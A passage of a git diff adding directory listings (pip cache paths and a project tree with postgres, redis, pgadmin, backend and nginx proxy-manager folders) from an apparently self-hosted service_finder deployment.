+/opt/service_finder/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c +/opt/service_finder/code-server-config/.cache/pip/http-v2/6 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/8/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/8/0/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/8/0/d/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/f/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/f/7/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/f/7/1/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/d/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/d/d/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/d/d/7/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458 +/opt/service_finder/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/5/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/5/5/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/5/5/2/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/5/5/2/5/6 +/opt/service_finder/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd +/opt/service_finder/code-server-config/.cache/pip/http-v2/5/5/2/5/6/55256db6e6c4a92962a75c471feaebd79e275a5b686bc92196b908dd.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/3/6 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/3/6/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/3/6/e/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/a/c +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/a/c/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/1/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/1/8/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/2/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/2/0/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/2/0/7/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/2/0/7/4/e207426cbcf220918fdf354826064190a066f96cd6ad8830f1f11fdc +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/0/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/0/b/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/0/b/4/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/e/0/b/4/f/e0b4f4d1d5b8bb8b844f230fb9255eeabd73b4bd6598e826c4219d4f +/opt/service_finder/code-server-config/.cache/pip/http-v2/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/e/c +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/e/c/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/e/c/f/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/8/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/8/f/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/8/f/7/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/0/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/0/e/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/0/e/9/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/f/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/f/0/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/f/0/a/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/b/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/b/2/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/b/2/4/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c +/opt/service_finder/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/a/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/a/e/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/a/e/8/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/a/e/8/4/0ae84cda1068eb8069d0d031ff1b592b6ce0646c279bf59396ff2d05.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/5/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/5/a/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/5/a/7/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/5/a/7/4/05a74540eb65ad078e4e70140f951919d2248dc11cb1db5ccba5484a.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/4/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/4/8/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/4/8/4/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/0/4/8/4/7/0484760df79b094114efd54bf890371889276bd276c1334d1207ab57 +/opt/service_finder/code-server-config/.cache/pip/http-v2/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/f/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/f/0/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/f/0/e/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/f/0/e/2/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c +/opt/service_finder/code-server-config/.cache/pip/http-v2/f/0/e/2/8/f0e28ece914c8ef232bd16f2cf5fb25d89ec879e8b2a76672e0df90c.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/b/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/b/8/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/b/8/0/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/b/8/0/2/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/6 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/6/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/6/b/5 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/6/b/5/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/e/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/e/e/3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/e/e/3/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/e/e/3/2/dee321d19881b0f93bb72eb4ca6571ddc1fcf222716907097a4957e1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/9/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/9/a/3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/9/a/3/db9a3eb3ed1c69080413f0e56d069f54abebad45f36724e37d4d717e +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/4/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/4/f/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f +/opt/service_finder/code-server-config/.cache/pip/http-v2/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/2/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/2/9/c +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/2/9/c/8 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/2/9/c/8/129c8212d0fe217a753409b4b46ca21c6dd736c8b4e08c093d03ecf3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/c +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/c/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/c/b/6 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/c/b/6/2 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/c/b/6/2/1cb62cfa729fe0a5b07499a3ba93e1da9751c5f79bd2e594bcf319a9.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/6 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/6/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/6/0/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/6/0/d/3 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/6/0/d/3/160d3e8f69a7eca4743b16bea3eecb80155f94e8435ce6481997004c.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/9/9 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/9/9/d +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/9/9/d/1 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/9/9/d/1/199d128a8b0a6a727869cf288f0802d0ddfe7785a99b6957366e40a4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/4/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/4/a/a +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/4/a/a/f +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/1/4/a/a/f/14aaf7643dce3f389cfaa2f24beba9e2d02071e4624c02c288b2a440 +/opt/service_finder/code-server-config/.cache/pip/http-v2/4 +/opt/service_finder/code-server-config/.cache/pip/http-v2/4/b +/opt/service_finder/code-server-config/.cache/pip/http-v2/4/b/e +/opt/service_finder/code-server-config/.cache/pip/http-v2/4/b/e/0 +/opt/service_finder/code-server-config/.cache/pip/http-v2/4/b/e/0/7 +/opt/service_finder/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9.body +/opt/service_finder/code-server-config/.cache/pip/http-v2/4/b/e/0/7/4be07d3ac353e38d2c9e3a257cad36ee2a758fc88b4cd5f0d479a5a9 +/opt/service_finder/code-server-config/.cache/Microsoft +/opt/service_finder/code-server-config/.cache/Microsoft/DeveloperTools +/opt/service_finder/code-server-config/.cache/Microsoft/DeveloperTools/deviceid +/opt/service_finder/code-server-config/workspace +/opt/service_finder/code-server-config/.profile +/opt/service_finder/alembic.ini +/opt/service_finder/CHANGELOG.md +/opt/service_finder/lista.txt +/opt/service_finder/init_dev.sh diff --git a/mappak.txt b/mappak.txt new file mode 100755 index 0000000..1a0597c --- /dev/null +++ b/mappak.txt @@ -0,0 +1,1280 @@ +. +./postgres +./postgres/data +./postgres/data/pg_commit_ts +./postgres/data/pg_logical +./postgres/data/pg_logical/snapshots +./postgres/data/pg_logical/mappings +./postgres/data/base +./postgres/data/base/16384 +./postgres/data/base/5 +./postgres/data/base/16537 +./postgres/data/base/1 +./postgres/data/base/4 +./postgres/data/pg_dynshmem +./postgres/data/pg_xact +./postgres/data/pg_stat +./postgres/data/pg_stat_tmp +./postgres/data/pg_subtrans +./postgres/data/pg_snapshots +./postgres/data/global +./postgres/data/pg_serial +./postgres/data/pg_replslot +./postgres/data/pg_tblspc +./postgres/data/pg_multixact +./postgres/data/pg_multixact/members +./postgres/data/pg_multixact/offsets +./postgres/data/pg_twophase +./postgres/data/pg_notify +./postgres/data/pg_wal +./postgres/data/pg_wal/summaries +./postgres/data/pg_wal/archive_status +./migrations +./migrations/__pycache__ +./migrations/versions +./migrations/versions/__pycache__ +./postgres_data +./postgres_data/pg_commit_ts +./postgres_data/pg_logical +./postgres_data/pg_logical/snapshots +./postgres_data/pg_logical/mappings +./postgres_data/base +./postgres_data/base/16384 +./postgres_data/base/5 +./postgres_data/base/1 +./postgres_data/base/4 +./postgres_data/pg_dynshmem +./postgres_data/pg_xact +./postgres_data/pg_stat +./postgres_data/pg_stat_tmp +./postgres_data/pg_subtrans +./postgres_data/pg_snapshots +./postgres_data/global +./postgres_data/pg_serial +./postgres_data/pg_replslot +./postgres_data/pg_tblspc +./postgres_data/pg_multixact +./postgres_data/pg_multixact/members +./postgres_data/pg_multixact/offsets +./postgres_data/pg_twophase +./postgres_data/pg_notify +./postgres_data/pg_wal +./postgres_data/pg_wal/archive_status +./redis +./redis/data +./redis/data/appendonlydir +./pgadmin_data +./pgadmin_data/sessions +./pgadmin_data/storage +./pgadmin_data/storage/kincses_gmail.com +./pgadmin_data/azurecredentialcache +./backend +./backend/migrations +./backend/migrations/versions +./backend/app +./backend/app/models +./backend/app/models/__pycache__ +./backend/app/core +./backend/app/core/__pycache__ +./backend/app/auth +./backend/app/schemas +./backend/app/schemas/__pycache__ +./backend/app/templates +./backend/app/templates/emails +./backend/app/templates/emails/hu +./backend/app/templates/emails/en +./backend/app/__pycache__ +./backend/app/static +./backend/app/scripts +./backend/app/api +./backend/app/api/v2 +./backend/app/api/v2/__pycache__ +./backend/app/api/__pycache__ +./backend/app/api/v1 +./backend/app/api/v1/__pycache__ +./backend/app/api/v1/endpoints +./backend/app/api/v1/endpoints/__pycache__ +./backend/app/services +./backend/app/services/__pycache__ +./backend/app/db +./backend/app/db/__pycache__ +./backend/app/crud +./backend/app/crud/__pycache__ +./backend/scrapers +./backend/_legacy_backup +./backend/frontend +./proxy-manager +./proxy-manager/letsencrypt +./proxy-manager/letsencrypt/archive +./proxy-manager/letsencrypt/archive/npm-13 +./proxy-manager/letsencrypt/archive/npm-16 +./proxy-manager/letsencrypt/archive/npm-5 +./proxy-manager/letsencrypt/archive/npm-15 +./proxy-manager/letsencrypt/archive/npm-11 +./proxy-manager/letsencrypt/archive/npm-14 +./proxy-manager/letsencrypt/archive/npm-4 +./proxy-manager/letsencrypt/archive/npm-18 +./proxy-manager/letsencrypt/renewal-hooks +./proxy-manager/letsencrypt/renewal-hooks/pre +./proxy-manager/letsencrypt/renewal-hooks/deploy +./proxy-manager/letsencrypt/renewal-hooks/post +./proxy-manager/letsencrypt/renewal +./proxy-manager/letsencrypt/live +./proxy-manager/letsencrypt/live/npm-13 +./proxy-manager/letsencrypt/live/npm-16 +./proxy-manager/letsencrypt/live/npm-5 +./proxy-manager/letsencrypt/live/npm-15 +./proxy-manager/letsencrypt/live/npm-11 +./proxy-manager/letsencrypt/live/npm-14 +./proxy-manager/letsencrypt/live/npm-4 +./proxy-manager/letsencrypt/live/npm-18 +./proxy-manager/letsencrypt/accounts +./proxy-manager/letsencrypt/accounts/acme-v02.api.letsencrypt.org +./proxy-manager/letsencrypt/accounts/acme-v02.api.letsencrypt.org/directory +./proxy-manager/letsencrypt/accounts/acme-v02.api.letsencrypt.org/directory/e417a583de478a0cfdeed332c1113068 +./proxy-manager/data +./proxy-manager/data/nginx +./proxy-manager/data/nginx/dead_host +./proxy-manager/data/nginx/proxy_host +./proxy-manager/data/nginx/default_www +./proxy-manager/data/nginx/default_host +./proxy-manager/data/nginx/redirection_host +./proxy-manager/data/nginx/stream +./proxy-manager/data/nginx/temp +./proxy-manager/data/letsencrypt-acme-challenge +./proxy-manager/data/access +./proxy-manager/data/custom_ssl +./proxy-manager/data/logs +./pgadmin +./pgadmin/data +./pgadmin/data/sessions +./pgadmin/data/storage +./pgadmin/data/storage/kincses_gmail.com +./pgadmin/data/azurecredentialcache +./.vscode_config +./.vscode_config/.local +./.vscode_config/.local/share +./.vscode_config/.local/share/nano +./.vscode_config/.local/share/code-server +./.vscode_config/.local/share/code-server/coder-logs +./.vscode_config/.local/share/code-server/Machine +./.vscode_config/.local/share/code-server/User +./.vscode_config/.local/share/code-server/User/History +./.vscode_config/.local/share/code-server/User/History/60db4d37 +./.vscode_config/.local/share/code-server/User/History/-b73a03a +./.vscode_config/.local/share/code-server/User/History/-36c7e04c +./.vscode_config/.local/share/code-server/User/History/366f1f9f +./.vscode_config/.local/share/code-server/User/History/544ad050 +./.vscode_config/.local/share/code-server/User/History/-65d51e9b +./.vscode_config/.local/share/code-server/User/History/29f7094b +./.vscode_config/.local/share/code-server/User/History/-7b582be +./.vscode_config/.local/share/code-server/User/History/-2735c434 +./.vscode_config/.local/share/code-server/User/History/62928eff +./.vscode_config/.local/share/code-server/User/History/6fad377d +./.vscode_config/.local/share/code-server/User/History/-74c5e47c +./.vscode_config/.local/share/code-server/User/History/44e986fa +./.vscode_config/.local/share/code-server/User/History/-77683dc0 +./.vscode_config/.local/share/code-server/User/History/-4212b206 +./.vscode_config/.local/share/code-server/User/History/14398474 +./.vscode_config/.local/share/code-server/User/History/-3dfff897 +./.vscode_config/.local/share/code-server/User/History/560c3702 +./.vscode_config/.local/share/code-server/User/History/-1307b4ae +./.vscode_config/.local/share/code-server/User/History/59b29e48 +./.vscode_config/.local/share/code-server/User/History/7a84dc56 +./.vscode_config/.local/share/code-server/User/History/-334bfc56 +./.vscode_config/.local/share/code-server/User/History/-28c6d5a +./.vscode_config/.local/share/code-server/User/History/-57c048d3 +./.vscode_config/.local/share/code-server/User/History/-22a85881 +./.vscode_config/.local/share/code-server/User/History/366631f3 +./.vscode_config/.local/share/code-server/User/History/fb7e7bc +./.vscode_config/.local/share/code-server/User/History/2ca76da5 +./.vscode_config/.local/share/code-server/User/History/-2e691610 +./.vscode_config/.local/share/code-server/User/History/-4b2a4237 +./.vscode_config/.local/share/code-server/User/History/-219a2af8 +./.vscode_config/.local/share/code-server/User/History/-7330191c +./.vscode_config/.local/share/code-server/User/History/29c9295f +./.vscode_config/.local/share/code-server/User/History/2cc892d2 +./.vscode_config/.local/share/code-server/User/History/292a9d0c +./.vscode_config/.local/share/code-server/User/History/-517f8cb2 +./.vscode_config/.local/share/code-server/User/History/-4e1f48b5 +./.vscode_config/.local/share/code-server/User/History/-4d4ca922 +./.vscode_config/.local/share/code-server/User/History/-4da16c1b +./.vscode_config/.local/share/code-server/User/History/-1b39eec9 +./.vscode_config/.local/share/code-server/User/History/-480d0047 +./.vscode_config/.local/share/code-server/User/History/544c5b73 +./.vscode_config/.local/share/code-server/User/History/4ef33482 +./.vscode_config/.local/share/code-server/User/History/-5322ebb2 +./.vscode_config/.local/share/code-server/User/History/2f47443d +./.vscode_config/.local/share/code-server/User/History/-30fedddb +./.vscode_config/.local/share/code-server/User/History/64bed780 +./.vscode_config/.local/share/code-server/User/History/-5db6cf04 +./.vscode_config/.local/share/code-server/User/History/-1ba00bbd +./.vscode_config/.local/share/code-server/User/History/-71e2d55f +./.vscode_config/.local/share/code-server/User/History/482da0ce +./.vscode_config/.local/share/code-server/User/History/2dfbf341 +./.vscode_config/.local/share/code-server/User/History/7f158c21 +./.vscode_config/.local/share/code-server/User/History/-29478f5a +./.vscode_config/.local/share/code-server/User/History/-7b58b5d6 +./.vscode_config/.local/share/code-server/User/History/-28e08209 +./.vscode_config/.local/share/code-server/User/History/-313525dc +./.vscode_config/.local/share/code-server/User/History/-5fbeb620 +./.vscode_config/.local/share/code-server/User/History/16f2aca3 +./.vscode_config/.local/share/code-server/User/History/-6c451dfd +./.vscode_config/.local/share/code-server/User/History/683e8c8 +./.vscode_config/.local/share/code-server/User/History/-177b50f1 +./.vscode_config/.local/share/code-server/User/History/-5e8dc48 +./.vscode_config/.local/share/code-server/User/History/3a2679b3 +./.vscode_config/.local/share/code-server/User/History/-330f7e6f +./.vscode_config/.local/share/code-server/User/History/2e5f3cd1 +./.vscode_config/.local/share/code-server/User/caches +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-461341b9 +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-39141af6 +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/f83f4cd +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/20ae27a4 +./.vscode_config/.local/share/code-server/User/caches/CachedConfigurations/folder/-23d72190 +./.vscode_config/.local/share/code-server/User/snippets +./.vscode_config/.local/share/code-server/User/globalStorage +./.vscode_config/.local/share/code-server/User/workspaceStorage +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/fe93b71a-e55f-4e3f-a4e7-7e7d3918caa3 +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/fe93b71a-e55f-4e3f-a4e7-7e7d3918caa3/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/e76151b8-00f8-42d1-94ff-80dcf97afcf8 +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/e76151b8-00f8-42d1-94ff-80dcf97afcf8/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/572c40db-876c-4fa1-ab7a-d8151bdaedb1 +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatEditingSessions/572c40db-876c-4fa1-ab7a-d8151bdaedb1/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/-14fc42bf/chatSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/3565f851-786d-46f9-98bf-2b88b4789a3e +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/3565f851-786d-46f9-98bf-2b88b4789a3e/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/1a3a721a-9b05-496e-9cd4-91890682a7c2 +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/1a3a721a-9b05-496e-9cd4-91890682a7c2/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/7a659de8-2306-4f81-bbc1-b5fa93a5527e +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/7a659de8-2306-4f81-bbc1-b5fa93a5527e/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/4f44a27a-de0a-4e31-904f-212ba1423280 